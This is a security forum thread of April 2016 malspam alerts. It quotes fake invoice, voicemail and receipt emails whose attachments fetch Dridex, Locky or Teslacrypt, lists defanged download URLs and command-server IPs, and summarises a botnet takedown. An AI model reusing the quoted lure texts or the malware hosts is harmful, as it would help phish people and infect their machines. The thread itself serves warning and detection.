From: Otis Ryan <cobranza@ moldecor .com>
Date:
Subject: Your parcel #898322, Status: Arrived Otis Ryan
Attachment: Otis Ryan.zip
    Valued Customer, Otis Ryan
    The check of 255.00$ for the parcel #617473 was received by our company and now has the Status: Paid.
    Our people has already shipped the purchase.
    Please, Be sure to write us back if you already received the order, as it should have been delivered on February 3, 2016.
    If you have any questions, you can check the details order enclosed to this e-mail, or call our department and we will offer you the other options.

4 April 2016: Otis Ryan.zip: Extracts to: Otis Ryan.js - Current Virus total detections 3/57*
.. MALWR** doesn’t show any downloads but Payload security[1] shows a download of some malware from
 yuilouters .com/img/sc.php?m=c2FuZHJhQG9uZWtuaWdodC5jby51aw%3D%3D&f=img.jpg (VirusTotal 4/56***). MALWR[2] - This isn’t a JPG (image file) but a -renamed- .exe file -despite- the icon showing it to be a jpg... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459789450/

** https://malwr.com/an...2ZmYzhkZDZiNTc/

1] https://www.reverse....environmentId=4
Host Address
130.255.129.102: https://www.virustot...02/information/

*** https://www.virustot...sis/1459790694/

2] https://malwr.com/an...DcwYjdlNGFjZGQ/

yuilouters .com: 193.33.197.174
176.105.171.196
46.98.193.150
176.124.235.127
176.103.235.5
178.217.162.239
5.1.14.100
79.113.106.239
86.126.0.128
176.36.70.114
 

  

Edited by AplusWebMaster, 04 April 2016 - 01:04 PM.

[AplusWebMaster]

FYI...

Fake 'Receipt' SPAM - xls macro malware
- https://myonlinesecu...-macro-malware/
5 Apr 2016 - "An email with the subject of 'Receipt' pretending to come from Mike <mike@ xencourier .co.uk> with a malicious Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
From: Mike  <mike@ xencourier .co.uk>
Date: Tue 05/04/2016 10:10
Subject: Receipt
Attachment: scan0001.xls
    Hi
    Here is your credit card receipt attached. VAT invoice to follw in due course.
    Best regards
    Mike ...

5 April 2016: scan0001.xls -  Current Virus total detections 4/57*
.. REVERSEIT** and  MALWR*** show a download from
 http ://unifire .in/43tgw - MALWR[4] VirusTotal 3/56[5]. I am unsure whether this is Dridex or Locky ransomware, judging by the auto analysis, I am guessing on Dridex with an anti-analysis component... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1459847342/

** https://www.reverse....environmentId=4
Contacted Hosts
184.154.132.107
195.169.147.78

*** https://malwr.com/an...zU5Y2IyNDVjZDY/
Hosts
184.154.132.107: https://www.virustot...07/information/
>> https://www.virustot...423d3/analysis/

4] https://malwr.com/an...TIxNWYyYmIwZmY/

5] https://www.virustot...sis/1459847771/
___

Fake 'Your Balance' SPAM - leads to Teslacrypt
- https://myonlinesecu...ypt-ransomware/
5 Apr 2016 - "An email with the subject of 'Actual Status on Your Balance 49166' [random numbered] pretending to come from random names and email addresses with a zip attachment is another one from the current bot runs which downloads Teslacrypt ransomware... The email looks like:
From: Random senders
Date: Tue 05/04/2016 13:05
Subject: Actual Status on Your Balance 49166
Attachment: zi_invoices_764173.zip
    Please find attached your actual statement for the period of 02/2016 to 03/2016.

5 April 2016: zi_invoices_764173.zip: Extracts to: check_WuKGkn.js - Current Virus total detections 23/56*
.. downloads Teslacrypt ransomware from
 http ://marvellrulesqq .com/70.exe?1 (VirusTotal 5/56**)... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1441173827/

** https://www.virustot...sis/1459859633/
TCP connections
23.229.239.227

marvellrulesqq .com: 185.118.142.154: https://www.virustot...54/information/
>> https://www.virustot...93956/analysis/
54.212.162.6: https://www.virustot....6/information/
>> https://www.virustot...bd5de/analysis/
104.161.60.151: https://www.virustot...51/information/
___

Fake 'Bank' SPAM - doc malware
- https://myonlinesecu...rd-doc-malware/
5 Apr 2016 - "This email that appears to be from Union National Bank-Egypt with the subject of 'PFI -05.04.16'  pretending to come from CEO Finexx Group <sales@ salesbabu .com> with a malicious word doc attachment is another one from the current bot runs...

Screenshot: https://myonlinesecu...ou-1024x597.png

5 April 2016 : Invvoice.docx - Current Virus total detections 8/56*
.. MALWR** - This -malicious- word doc has an -embedded- .exe file that gets extracted and decoded when you click-on-the-icon inside the word doc to deliver MICROSOFT.exe (VirusTotal 7/55***). This was passed on to me by another analyst... When I extracted the malware from the word doc I got THIS (VT 7/57[4]) differently detected malware... See screenshot (below):
> https://myonlinesecu...cx-1024x532.png
 These embedded OLE objects will extract from ANY office program that can read & display word docs, as far as I am aware this also includes open office, libre office and all the other non-Microsoft programs. If you do follow their advice and click-on-the-object... it is game-over and you-are-compromised... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1459854693/

** https://malwr.com/an...zljMGUxMWFhNzk/

*** https://www.virustot...sis/1459854644/
TCP connections
93.184.220.29
104.86.111.136

4] https://www.virustot...sis/1459861778/
___

Fake 'Invoice - e-pay' SPAM - JS malware leads to Dridex
- https://myonlinesecu...eads-to-dridex/
5 Apr 2015 - "An email with the subject of 'Invoice: 912409' pretending to come from UK e-pay Email Server (epay UK) <DO.NOT.REPLY.TO@ uk.epayworldwide .com> with a zip attachment is another one from the current bot runs which downloads Dridex banking Trojan... The email looks like:
From: UK e-pay Email Server (epay UK) <DO.NOT.REPLY.TO@ uk.epayworldwide .com>
Date: Tue 05/04/2016 12:24
Subject: Invoice: 912409
Attachment: PeriodSummarybyTerminal.zip
    Account: 912409

5 April 2016: PeriodSummarybyTerminal.zip: Extracts to: KFVL-902246613812.js - Current Virus total detections 6/57*
.. Downloads Dridex banking Trojan from
 http ://mekongtrails .com/4543t43 (VirusTotal 5/56**) Which appears to be the -same- version and also using the -same- file names and the -same- other download locations as THIS earlier malspam run***... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459859137/

** https://www.virustot...sis/1459858301/

*** https://myonlinesecu...-macro-malware/

mekongtrails .com: 173.236.74.11: https://www.virustot...11/information/
>> https://www.virustot...ab5f6/analysis/
___

Fake 'Unpaid Bill' SPAM - JS malware leads to Teslacrypt
- https://myonlinesecu...-to-teslacrypt/
5 Apr 2016 - "An email with the subject of 'Unpaid Bill for Car Repair Service 7650' [random numbered] pretending to come from random names and email addresses with a zip attachment is another one from the current bot runs which downloads teslacrypt... The email looks like:
From: Random
Date: Tue 05/04/2016 16:33
Subject: Unpaid Bill for Car Repair Service 7650
Attachment: copy_xerox.device5_868199.zip
    We kindly ask you to review our unpaid bill again and send us the payment in order to avoid additional costs.

5 April 2016: copy_xerox.device5_868199.zip: Extracts to: finance_NJTugN.js - Current Virus total detections 7/57*
.. MALWR** and payload security*** shows a download of Teslacrypt from
 marvellrulesqq .com/70.exe?1 (VirusTotal 4/56[4]) or
 http ://marvellrulesqq .com/80.exe?1 (VirusTotal 4/57[5]). Although both files are the same size they have different sha1# ... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459871414/

** https://malwr.com/an...TZiYjFiMGYyNGY/
Hosts
104.161.60.151
23.229.239.227
194.228.3.204

*** https://www.hybrid-a...environmentId=4
Contacted Hosts
54.212.162.6
23.229.239.227
194.228.3.204

4] https://www.virustot...sis/1459872787/
TCP connections
23.229.239.227
194.228.3.204
107.180.26.75
192.185.151.39

5] https://www.virustot...sis/1459873099/
TCP connections
23.229.239.227
194.228.3.204

marvellrulesqq .com: 185.118.142.154: https://www.virustot...54/information/
>> https://www.virustot...e2817/analysis/
54.212.162.6: https://www.virustot....6/information/
>> https://www.virustot...bd5de/analysis/
104.161.60.151: https://www.virustot...51/information/
 

  

Edited by AplusWebMaster, 05 April 2016 - 02:39 PM.

[AplusWebMaster]

FYI...

Fake 'Voicemail' SPAM - JS malware
- https://myonlinesecu...437-js-malware/
4 Apr 2016 - "An email with the subject of 'New Voicemail Message From 07792084437' [random numbers] pretending to come from Soho66 <noreply@ soho66 .co.uk> with a zip attachment is another one from the current bot runs which downloads some sort of malware... The email looks like:
From: Soho66 <noreply@ soho66 .co.uk>
Date:
Subject: New Voicemail Message From 07792084437
Attachment: MSG0000060895.WAV.RAR
    Hi,
    You have been left a 0:19 long message (number 11) in mailbox 1006 from 07792060895, on Wed, 06 Apr 2016 06:13:47 -0400
    The voicemail message has been attached to this email as a wave file – which you can play on most computers.
    Our Regards
    The Soho66 Customer Team
    Please do not reply to this message. This is an automated message which comes from an unattended mailbox...

6 April 2016: MSG0000060895.WAV.RAR: Extracts to: MSG00004481919.WAV.js - Current Virus total detections 5/57*
.. MALWR** shows a download from  http ://mapstor .org/1278u0 (VirusTotal 1/57***). MALWR[4]... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459938427/

** https://malwr.com/an...zlhMDU4NTBmMDk/
Hosts
104.27.167.24: https://www.virustot...24/information/
>> https://www.virustot...b40e7/analysis/

*** https://www.virustot...sis/1459939012/

4] https://malwr.com/an...mVkOWQ0YWJhZmI/
___

Fake 'Invoicing' SPAM - JS malware
- https://myonlinesecu...ing-js-malware/
6 Apr 2016 - "An email with no subject pretending to come from Liberty Wines, Invoicing <invoicing@ libertywines .co.uk> with a zip attachment is another one from the current bot runs which downloads an unknown malware probably either Locky ransomware or Dridex banking Trojan... The email looks like:
From: , Invoicing <invoicing@ libertywines .co.uk>
Date: Wed 06/04/2016 11:50
Subject: [blank/empty]
Attachment: Sales-Invoice  LWIN0136332.rar
    Dear Customer,
    Please find attached your invoice, number: LWIN0136332.
    Kind regards,
    Liberty Wines

6 April 2016: Sales-Invoice LWIN0136332.rar: Extracts to: MSG00008141521.WAV.js - Current Virus total detections 5/57*
.. MALWR** shows a download from http ://vnnsports .com/1278u0 which although a different # is the -same- malware as described in THIS earlier post***... This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a DOC or other normal file instead of the .exe/JS file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustot...sis/1459939899/

** https://malwr.com/an...DRiNTczNGIxMGY/
Hosts
184.154.132.107: https://www.virustot...07/information/
>> https://www.virustot...59b1b/analysis/

*** https://myonlinesecu...437-js-malware/
___

Fake 'Document(1)' SPAM - doc macro malware
- https://myonlinesecu...-macro-malware/
6 Apr 2016 - "A blank/empty email with the subject of 'Document(1)' pretending to come from your own email address with a malicious word doc attachment is another one from the current bot runs...  The email looks like:
From: your email address
Date: Wed 06/04/2016 14:15
Subject: Document(1)
Attachment: Document(1).doc

Body content: Totally empty/Blank

6 April 2016: Document(1).doc - Current Virus total detections 10/56*
.. MALWR shows a download of Dridex banking Trojan from
 http ://jabez .jp/1278u0 (VirusTotal 12/57**)... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1459948652/

** https://www.virustot...sis/1459961706/
TCP connections
109.235.139.64

jabez .jp: 120.136.14.15: https://www.virustot...15/information/
___

Fake 'Remittance Details' SPAM - rtf macro malware delivers Dridex
- https://myonlinesecu...elivers-dridex/
6 Apr 2016 - "An email with the subject of 'Remittance Details (USD 7956.88) – your-web-address' pretending to come from random senders with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... One of the emails looks like:
From: random senders
Date: Wed 06/04/2016 16:04
Subject: Remittance Details (USD 7956.88) – securityandprivacy.co.uk
Attachment: Invoice Number 0297376 – Issue Date 02165639.rtf
    Dear All
    Please find attached your banking details and do note the difference from the one we have We are to proceed with the payment of USD 7956.88 so please do verify attached bank details to avoid making payment to the wrong person as it is our custom. Please reply if you have any questions. Thanks Beryl Frye NAMIBIAN RESOURCES...

6 April 2016: Invoice Number 0297376 – Issue Date 02165639.rtf - Current Virus total detections 4/56*
.. MALWR** shows a download of Dridex banking Trojan from
 http ://shop.bleutree .biz/tablets/galaxytab3.php which gave me crypted122med.exe (VirusTotal 5/56***)...
DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1459960107/

** https://malwr.com/an...jYzMWRmNDg5NmY/
Hosts
85.143.209.13: https://www.virustot...13/information/
>> https://www.virustot...a9d13/analysis/

*** https://www.virustot...sis/1459960596/

shop.bleutree .biz: 85.143.209.13
___

Fake 'Security Update' SPAM - BT phish
- https://myonlinesecu...te-bt-phishing/
6 Apr 2016 - "'Attention! Security Update' pretending to come from BT is one of the latest -phish- attempts to steal your BT details and your Bank, credit card and personal details... This one wants your personal details, BT log in details and your credit card and bank details. Many of them are also designed to specifically steal your email, facebook and other social network log in details as well...

Screenshot: https://myonlinesecu...il-1024x781.png

... When (IF) you fill in your user name and password you are sent to a page where the phishers try to validate your details to make sure that you are entering “genuine” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format... All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
 

  

Edited by AplusWebMaster, 06 April 2016 - 02:11 PM.

[AplusWebMaster]

FYI...

Fake 'invoice' SPAM - doc macro malware
- https://myonlinesecu...-macro-malware/
7 Apr 2016 - "A -series- of emails with the basic subject of 'invoice' pretending to come from random names with a malicious word doc attachment is another one from the current bot runs... Some of the subjects seen include:
    Uta Mclaughlin: Latest Invoice
    Meghan Mckay, Sales Invoice
    Fwd:Camille Glover. Purchase Invoice
The email looks like:
From: Uta Mclaughlin <nickbockholdt@ gmx .de> / Meghan Mckay <ramykhalifa@ emerge-studio .com> /
Camille Glover <david@ deliciousworldcorp .com>
Date: Thu 07/04/2016 04:51
Subject:  Uta Mclaughlin: Latest Invoice
Attachment: 4872113603.doc
    Please review the document enclosed with this message.
    Kind regards
    Meghan Mckay

7 April 2016: 4872113603.doc - Current Virus total detections 3/57*
.. Payload Security** shows a download from creditprimo .com/h1.jpg?BbZJpyfbopM=12
  which gives this image (VirusTotal 2/57***). The macro extracts the malware from the image to give
  12120.exe (VirusTotal 2/57[4]). MALWR[5]... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1460006738/

** https://www.hybrid-a...environmentId=4
Contacted Hosts
138.128.125.153

*** https://www.virustot...sis/1460008049/

4] https://www.virustot...sis/1460007688/

5] https://malwr.com/an...ThjNWFhMDk3Mzc/
___

Fake 'Your Latest Documents' SPAM - doc macro malware leads to Locky Ransomware
- https://myonlinesecu...cky-ransomware/
7 Apr 2016 - "An email with the subject of 'Your Latest Documents' from Angel Springs Ltd [STA054C] pretending to come from ebilling@ angelsprings .com with a malicious word doc attachment is another one from the current bot runs...

Screenshot: https://myonlinesecu...4C-848x1024.png

7 April 2016: G-A0288010040780590521.pdf / G-A0288010040780590521.docm - Current Virus total detections 9/56*
.. MALWR** shows a download from http ://360webhosts .com/0uh634 (VirusTotal 13/56***)  which is the -same- malware as described HERE[4] which is actually a downloader that downloads from 185.103.252.148/files/o35jkR.exe which is Locky Ransomware (VirusTotal 2/56[5])...  DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1460028627/

** https://malwr.com/an...GIzNGQ0NzYyZGQ/
Hosts
202.87.31.185: https://www.virustot...85/information/
>> https://www.virustot...7c663/analysis/
109.235.139.64

*** https://www.virustot...sis/1460027909/
TCP connections
109.235.139.64

4] https://myonlinesecu...-macro-malware/

5] https://www.virustot...sis/1460026504/

185.103.252.148: https://www.virustot...48/information/
>> https://www.virustot...d971a/analysis/
 

  

Edited by AplusWebMaster, 07 April 2016 - 06:48 AM.

[AplusWebMaster]

FYI...

Researchers shut down SPAM botnet - 4,000 Linux machines
- http://arstechnica.c...linux-machines/
Apr 9, 2016 - "A botnet that enslaved about 4,000-Linux-computers and caused them to blast the Internet with spam for more-than-a-year has finally been shut down. Known as -Mumblehard- the botnet was the product of highly skilled developers. It used a custom "packer" to conceal the Perl-based source code that made it run, a backdoor that gave attackers persistent access, and a mail daemon that was able to send large volumes of spam. Command servers that coordinated the compromised machines' operations could also send messages to Spamhaus requesting the -delisting- of -any- Mumblehard-based IP addresses... In the months following Eset's* discovery of Mumblehard in late 2014, company researchers worked with Estonian law enforcement and an industry partner to shut down the botnet. In February of this year, the group took control of the Internet address belonging to the command server, making it possible for researchers to "sinkhole" the botnet. Rather than connecting to the attackers' control server, the infected machines connected to benign machines operated by the takedown participants. By analyzing the incoming traffic, they estimated that about 4,000 computers were infected. Researchers still don't know how Mumblehard was able to initially take hold of its victims... The number of machines reporting to the sinkholed server has been slowly dropping as compromised systems are disinfected."
* http://www.welivesec...-from-spamming/

> http://www.welivesec...ole_stats_1.png
Stats from Mumblehard sinkhole

> http://www.welivesec...ole_stats_2.png
Statistics from our new sinkhole
 

  

Edited by AplusWebMaster, 09 April 2016 - 02:39 PM.

[AplusWebMaster]

FYI...

Ransomware: Past, Present, and Future
- https://blogs.cisco....sent-and-future
Apr 11. 2016 - "... The problem we face is that every single business that -pays- to recover their files, is directly funding the development of the next generation of ransomware. As a result of this we’re seeing ransomware evolve at an alarming rate... Ransomware as we know it today has a sort of ‘spray and pray’ mentality; they hit as many individual targets as they can as quickly as possible. Typically, payloads are delivered via exploit kits or mass phishing campaigns. Recently a number of scattered ransomware campaigns deliberately targeting enterprise networks, have come to light. We believe that this is a harbinger of what’s to come — a portent for the future of ransomware. Traditionally, malware was never terribly concerned with the destruction of data or denial of access to its contents; With few notable exceptions, data loss was mostly a side-effect of malware campaigns. Most actors were concerned with sustained access to data or the resources a system provided to meet their objectives. Ransomware is a change to this paradigm from subversion of systems to outright extortion; actors are now denying access to data, and demanding money to restore access to that data..."
> http://blog.talosint...mware.html#more
___

Fake 'DTC Workshop' SPAM - doc macro malware
- https://myonlinesecu...-macro-malware/
11 Apr 2016 - "An email with the subject of 'Emailing: M_20150401_0729_AY56EMF __XLRAE55CF0L324298' pretending to come from DTC Workshop <workshop@ digitaltachocentre .co.uk> with a malicious word doc attachment is another one from the current bot runs... The email looks like:
From: DTC Workshop <workshop@ digitaltachocentre .co.uk>
Date: Mon 11/04/2016 10:16
Subject: Emailing: M_20150401_0729_AY56EMF      __XLRAE55CF0L324298
Attachment: M_20150401_0729_AY56EMF      __XLRAE55CF0L324298.DOCM
    Your message is ready to be sent with the following file or link
    attachments:
    M_20150401_0729_AY56EMF     __XLRAE55CF0L324298
    Note: To protect against computer viruses, e-mail programs may prevent
    sending or receiving certain types of file attachments. Check your e-mail
    security settings to determine how attachments are handled.

11 April 2016: M_20150401_0729_AY56EMF      __XLRAE55CF0L324298.DOCM Current Virus total detections 8/57*
.. MALWR** and Payload Security*** show a download from http ://oootels .ru/87t5gh (VirusTotal 5/56[/4])
 which looks like Dridex banking Trojan but might be a rockloader Locky ransomware downloader
.. MALWR[5] analysis is inconclusive... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustot...sis/1460366222/

** https://malwr.com/an...WFhYTQxZjJmOWU/
Hosts
90.156.201.101

*** https://www.hybrid-a...environmentId=4
Contacted Hosts
90.156.201.59
194.116.73.71

4] https://www.virustot...sis/1460365587/

5] https://malwr.com/an...GFmYzVmOGEyZTU/

oootels .ru: 90.156.201.25
90.156.201.101
90.156.201.59: https://www.virustot...59/information/
>> https://www.virustot...b3667/analysis/
90.156.201.67: https://www.virustot...67/information/
>> https://www.virustot...e26f7/analysis/
 

  

Edited by AplusWebMaster, 11 April 2016 - 09:33 AM.